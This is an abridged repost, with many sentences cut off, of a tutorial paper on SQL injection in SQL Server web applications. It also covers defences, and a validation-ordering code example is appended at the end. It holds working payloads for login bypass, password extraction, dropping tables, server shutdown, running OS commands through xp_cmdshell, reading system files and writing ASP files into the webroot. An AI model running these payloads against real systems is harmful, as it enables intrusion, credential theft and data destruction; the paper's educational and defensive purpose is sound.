SQL Server advanced techniques: Advanced SQL Injection in SQL Server Applications
Published: Thursday, February 12, 2009
Abstract: This document discusses SQL injection techniques in detail … This document …

Introduction: SQL is … When …

    Select id,forename,surname from authors

This statement returns all rows of the authors table. …

    Select id,forename,surname from authors where forename='john' and surname='smith'

It is important to point out … as follows:

    Forename: jo'hn
    Surname: smith

The query becomes:

    Select id,forename,surname from authors where forename='jo'hn' and surname='smith'

When the database tries to execute this query …

    Server: Msg 170, Level 15, State 1, Line 1
    Line 1: Incorrect syntax near 'hn'

The cause of this result …

    Forename: jo';drop table authors--
    Surname:

The result is that the authors table is deleted. …

It might seem that removing single quotes from the input, or avoiding them in some way, would solve this problem. …

    Select id,forename,surname from authors where id=1234

In this case … We go further … This is …

    <HTML>
    <HEAD>
    <TITLE>Login Page</TITLE>
    </HEAD>
    <BODY bgcolor='000000' text='cccccc'>
    <FONT Face='tahoma' color='cccccc'>
    <CENTER><H1>Login</H1>
    <FORM action='process_login.asp' method=post>
    <TABLE>
    <TR><TD>Username:</TD><TD><INPUT type=text name=username size=100 width=100></TD></TR>
    <TR><TD>Password:</TD><TD><INPUT type=password name=password size=100 width=100></TD></TR>
    </TABLE>
    <INPUT type=submit value='Submit'><INPUT type=reset …
    </FORM>
    </Font>
    </BODY>
    </HTML>

Below is process_login.asp …

    <HTML>
    <BODY bgcolor='000000' text='ffffff'>
    <FONT Face='tahoma' color='ffffff'>
    <STYLE>
    p { font-size: 20pt !important }
    font { font-size: 20pt !important }
    h1 { font-size: 64pt !important }
    </STYLE>
    <%@LANGUAGE = JScript %>
    <%
    function trace( str )
    {
        …
            Response.write( str );
    }

    function Login( cn )
    {
        var username;
        var password;
        username = Request.form("username");
        password = Request.form("password");
        var rso = Server.CreateObject("ADODB.Recordset");
        // The query is built by concatenating the submitted values
        var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
        trace( "query: " + sql );
        rso.open( sql, cn );
        …
            rso.close();
    %>
    <FONT Face='tahoma' color='cc0000'>
    <H1>
    <BR><BR>
    <CENTER>ACCESS DENIED</CENTER>
    </H1>
    </BODY>
    </HTML>
    <%
            Response.end
        …
            Session("username") = "" + rso("username");
    %>
    <FONT Face='tahoma' color='00cc00'>
    <H1>
    <CENTER>ACCESS GRANTED<BR>
    <BR>
    Welcome,
    <%
            Response.write(rso("Username"));
            Response.write( "</BODY></HTML>" );
            Response.end
        }
    }

    function Main()
    {
        var username
        var cn = Server.createobject( "ADODB.Connection" );
        cn.connectiontimeout = 20;
        cn.open( "localserver", "sa", "password" );
        username = …
        …
            Login( cn );
        }
        cn.close();
    }

    Main();
    %>

The problem lies …

    var sql = "select * from users where username='" + username + "' and password='" + password + "'";

If the user enters …

    Username: ';drop table users--
    Password:

the users table in the database will be deleted. …

An attacker need only supply … that they know …

    Username: admin'--

The attacker can use the first … in the users table …

    Username: ' or 1=1--

More specifically …

    Username: ' union select 1,'fictional_user','some_password',1--

This result … Through …

This was more or less first discovered by David Litchfield …

In order to manipulate … in the database …

    create table users(
        id int,
        username varchar(255),
        password varchar(255),
        privs int
    )

Then the following …

    insert into …
    insert into …
    insert into …
    insert into …

If we … Fortunately … (below, …

First …

    Username: ' having 1=1--

This produces the following …

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    /process_login.asp, line 35

So the attacker now knows the table …

    Username: ' group by users.id having 1=1--

This produces …

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /process_login.asp, line 35

Eventually, after the attacker has obtained the username field:

    ' group by users.id,users.username,users.password,users.privs having 1=1--

This statement does not produce …

    select * from users where username=''

So the attacker now knows that the query involves the users table …

… able to determine each column's …

    Username: ' union select sum(username) from users--

This exploits the fact that SQL Server, in determining … the two result sets …

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
    /process_login.asp, line 35

This tells us that the 'username' field …

    Username: ' union select sum(id) from users--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
    /process_login.asp, line 35

We can use this technique to approximately determine … of any table in the database …

This allows the attacker to write …

    Username: ';insert into …

This technique …

    select * from master..sysmessages

Interpreting these leads to interesting …

    Username: ' union select @@version,1,1,1--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition …
    /process_login.asp, line 35

This attempts to convert the built-in …

This technique can be used to read … of any table in the database …

    Username: ' union select min(username),1,1,1 from users where username>'a'--

This selects, from the users table, … among the usernames greater than 'a' …

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.
    /process_login.asp, line 35

So the attacker now knows that the user admin exists …

    Username: ' union select min(username),1,1,1 from users where username>'admin'--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'chris' to a column of data type int.
    /process_login.asp, line 35

…

    Username: ' union select password,1,1,1 from users where username='admin'--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'r00tr0x!' to a column of data type int.
    /process_login.asp, line 35

…

    begin declare @ret varchar(8000)
    …
    select @ret=@ret+' '+username+'/'+password from users where username>@ret
    select @ret as ret into …
    end

The attacker logs in using this as the username (all on …

    Username: '; begin declare @ret varchar(8000) …

This creates …

The attacker can then retrieve what we want …

    Username: ' union select ret,1,1,1 from foo--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.
    /process_login.asp, line 35

and then drops (deletes) the table to cover their tracks:

    Username: '; drop table foo--

This example is merely … of this technique …

Gaining higher …

1. … on the database server …
2. Use the xp_regread extended stored procedure to read the registry …
3. Use other stored procedures to alter the server
4. … on linked …
5. Create custom extended stored procedures to run exploit code within the SQL Server process
6. Use the 'bulk insert' statement to read … on the server
7. Use bcp to create arbitrary … on the server
8. Use the sp_OACreate, sp_OAMethod and sp_OAGetProperty system stored procedures to create ActiveX applications …

These list only the very common …

[xp_cmdshell]

Many stored procedures are built into SQL Server … xp_cmdshell is …

    exec master..xp_cmdshell 'dir'

will obtain … of the SQL Server process …

    exec master..xp_cmdshell 'net user'

will provide … of all users on the server …

[xp_regread]

Another …

    xp_regaddmultistring
    xp_regdeletekey
    xp_regdeletevalue
    xp_regenumkeys
    xp_regenumvalues
    xp_regread
    xp_regremovemultistring
    xp_regwrite

These …

    exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

This determines what kind of …

    exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'

This displays all SNMP community configuration on the server … It is easy to imagine …

[Other stored procedures]

The xp_servicecontrol procedure allows a user to start …

    exec master..xp_servicecontrol 'start','schedule'
    exec master..xp_servicecontrol 'start','server'

The table below lists a few …

    xp_availablemedia      shows the available … on the machine
    xp_dirtree             allows … to be obtained
    xp_enumdsn             enumerates … on the server
    xp_loginconfig         reveals information about the security mode of the server
    xp_makecab             allows the user to create … on the server
    xp_ntsec_enumdomains   …
    xp_terminate_process   … process …

[Linked Servers]

SQL Server provides …

[Custom extended stored procedures]

Extended stored procedure applications …

    sp_addextendedproc 'xp_webserver','c:\temp\xp_foo.dll'

In the normal …

    exec xp_webserver

…

    sp_dropextendedproc 'xp_webserver'

[Importing text files into tables]

Using the 'bulk insert' statement it is possible to …

    create table foo( line varchar(8000) )

Then run a bulk insert to … from the file …

    bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'

The above can be used …

[Creating text files using bcp]

Using 'bulk insert' … Since bcp accesses the database from outside the SQL Server process … The command line format is as follows:

    bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

The 'S' parameter is … that runs the query …

[ActiveX automation scripts in SQL SERVER]

SQL Server provides several built-in …

(1) This example uses the 'wscript.shell' object to create …

    -- wscript.shell example
    declare @o int
    exec sp_oacreate 'wscript.shell',@o out
    exec sp_oamethod @o,'run',NULL,'notepad.exe'

We can run it by specifying it after the username:

    Username: '; declare @o int …

(2) This example uses the 'scripting.filesystemobject' object to read …

    -- scripting.filesystemobject example - read a known file
    declare @o int …
    declare @line varchar(8000)
    exec sp_oacreate 'scripting.filesystemobject', @o out
    exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
    exec @ret=sp_oamethod @f,'readline',@line out
    while(@ret=0)
    begin
        print …
        exec @ret=sp_oamethod @f,'readline',@line out
    end

(3) This example creates …

    -- scripting.filesystemobject example - create a 'run this' .asp file
    declare @o int …
    exec sp_oacreate 'scripting.filesystemobject',@o out
    exec sp_oamethod @o,'createtextfile',@f out,'c:\inetpub\wwwroot\foo.asp',1
    exec @ret=sp_oamethod @f,'writeline',NULL,'<% …

It should be pointed out …

(4) These examples illustrate … of this technique …

    declare @o int …
    exec sp_oacreate 'speech.voicetext',@o out
    exec sp_oamethod @o,'register',NULL,'foo','bar'
    exec sp_oa…
    exec sp_oamethod @o,'speak',NULL,'all your sequel servers are belong to,us',528
    waitfor delay '00:00:05'

We can … in our assumed …

    Username: admin';declare @o int …

[Stored procedures]

It is said that if … In essence … A better …

- If …
- If …

Obviously … To illustrate … stored procedures …

    sp_who '1' select * from sysobjects

or

    sp_who '1';select * from sysobjects

Any …

[Advanced SQL injection]

Usually … In this section …

[Without single quotes …]

Sometimes developers will … by filtering all …

    function escape(input)
        input=replace(input,"'","''")
        escape=input
    end function

Admittedly, this prevents all of our examples … If the attacker wants to produce … without using single quotes …

    insert into …
        char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
        char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
        0xffff)

This is … Of course …

    insert into … 123, 123, 0xffff)

SQL Server automatically converts integers to varchar …

[Second-Order SQL Injection]

Even if the application … For example …

    Username: admin'--
    Password: password

The application …

    insert into …

Suppose the application …

    username = escape( Request.form("username") );
    oldpassword = escape( Request.form("oldpassword") );
    …
    var rso = Server.CreateObject("ADODB.Recordset");
    var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
    rso.open( sql, cn );
    …
    {
        …

Setting the new password …

    sql = "update users set …

rso("username") is the … returned by the login query … When the username is admin'-- …

    update users set …

In this way the attacker can, by registering … This is …

    O'Brien

From … If the attacker does not use any application …

    response.end

or a similar …

[Length limits]

To give the attacker more …

    Username: ';shutdown--

This uses only 12 input …

    drop table <tablename>

If the length limit is … filtering …

    Username: aaaaaaaaaaaaaaa'
    Password: '; shutdown--

The reason is that the application …

    select * from users where username='aaaaaaaaaaaaaaa'' and password=''';shutdown--

In effect …

    aaaaaaaaaaaaaaa' and password='

So in the end …

[Audit]

SQL Server includes a rich …

    sp_password

to …

    --'sp_password' was found in the text of this event.
    -- The text has been replaced with this comment for security reasons.

This behaviour occurs in all … Therefore …

    Username: admin'--sp_password

In fact …

[Defences]

This section discusses … against the described …

[Input validation]

Input validation is … The following is … Different …

1) Attempt to modify the data so that it becomes valid …
2) Reject … that is considered to be …
3) Accept only … that is considered to be valid …

The first … The second case also suffers from … of the first … The third case is probably the best of the three …

From a security standpoint, combining method 2 and method 3 is probably the best … with a hyphen …

    Quentin Bassington-Bassington

We must allow hyphens in valid input …

When combining data modification and …

    uni'on sel'ect @@version-'-

Since the single quotes are removed …

Here are …

Method 1 …

    function escape(input)
        input=replace(input,"'","''")
        escape=input
    end function

Method 2: reject known …

    function validate_string …
        known_bad= …
        validate_string …
        for i=lbound(known_bad) to ubound(known_bad)
            if …
                validate_string …
                exit function
            end if
        next
    end function

Method 3: allow only valid …

    function validatepassword(input)
        good_password_chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        validatepassword=true
        for i=1 to len(input)
            c=mid(input,i,1)
            ' reject any character that is not in the allowed set
            if instr(good_password_chars,c)=0 then
                validatepassword=false
                exit function
            end if
        next
    end function

[SQL Server lockdown]

It is pointed out here …

1. Determine … connecting to the server …
   a. Make sure … that you are using …
2. Determine which accounts exist …
   a. … for the application …
   b. Remove unnecessary …
   c. Make sure all accounts have strong …
3. Determine which objects exist
   a. Many extended stored procedures can be safely removed …
   b. Remove all sample databases, for example the 'northwind' and 'pubs' databases
4. Determine which accounts can use which objects
   a. The application …
5. Determine … of the server …
   a. For SQL Server there are …
6. Determine what should be logged …

[References]

[1] Web Application Disassembly with ODBC Error Messages, David Litchfield. http://www.nextgenss.com/papers/webappdis.doc
[2] SQL Server Security Checklist. http://www.sqlsecurity.com/checklist.asp
[3] SQL Server 2000 Extended Stored Procedure Vulnerability. http://www.atstake.com/research/advisories/2000/a120100-2.txt
[4] Microsoft SQL Server Extended Stored Procedure Vulnerability. http://www.atstake.com/research/advisories/2000/a120100-1.txt
[5] Multiple Buffer Format String Vulnerabilities In SQL Server. http://www.microsoft.com/technet/security/bulletin/MS01-060.asp http://www.atstake.com/research/advisories/2001/a122001-1.txt
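The two ordering failures described in the length-limit and input-validation sections (escaping before truncating, and checking before stripping quotes), next to a reject-only allow-list check in the spirit of method 3, as an added example that is not part of the original paper. The function names, the 16-character limit and the KNOWN_BAD list are assumptions made for the illustration.

```javascript
// Added example. Function names, the 16-character limit and the
// KNOWN_BAD list are assumptions, not taken from the page.

// Method 1 from the page: double every single quote.
function escapeQuotes(input) {
  return input.replace(/'/g, "''");
}

// Flawed order 1: escape first, truncate afterwards. Cutting inside a
// doubled quote leaves one bare quote at the end of the value.
function escapeThenTruncate(input, max) {
  return escapeQuotes(input).slice(0, max);
}

// True when a value still holds a quote that is not part of a '' pair.
function hasDanglingQuote(value) {
  return value.replace(/''/g, "").includes("'");
}

// Flawed order 2: reject known-bad tokens, then strip quotes. The check
// runs before stripping joins the fragments back together.
const KNOWN_BAD = ["select", "union", "insert", "update", "delete", "drop", "--"];
function rejectThenStrip(input) {
  const lower = input.toLowerCase();
  if (KNOWN_BAD.some((token) => lower.includes(token))) return null;
  return input.replace(/'/g, "");
}

// Allow-list check on the raw input: test the length first, accept only
// letters and digits, and never modify the value.
function validateStrict(input, max) {
  if (typeof input !== "string") return false;
  if (input.length === 0 || input.length > max) return false;
  return /^[A-Za-z0-9]+$/.test(input);
}

// Inputs modelled on the page's two examples.
const LONG_NAME = "a".repeat(15) + "'";
const SPLIT_KEYWORDS = "uni'on sel'ect @@version-'-";

function demo() {
  const truncated = escapeThenTruncate(LONG_NAME, 16);
  return {
    truncated,
    dangling: hasDanglingQuote(truncated),
    rejoined: rejectThenStrip(SPLIT_KEYWORDS),
    strictLong: validateStrict(LONG_NAME, 16),
    strictSplit: validateStrict(SPLIT_KEYWORDS, 64),
    strictPlain: validateStrict("chris", 16),
  };
}

console.log(demo());
```

Validation of this kind narrows what reaches the query; the value should still be passed to the database as a bound parameter rather than concatenated into the statement text.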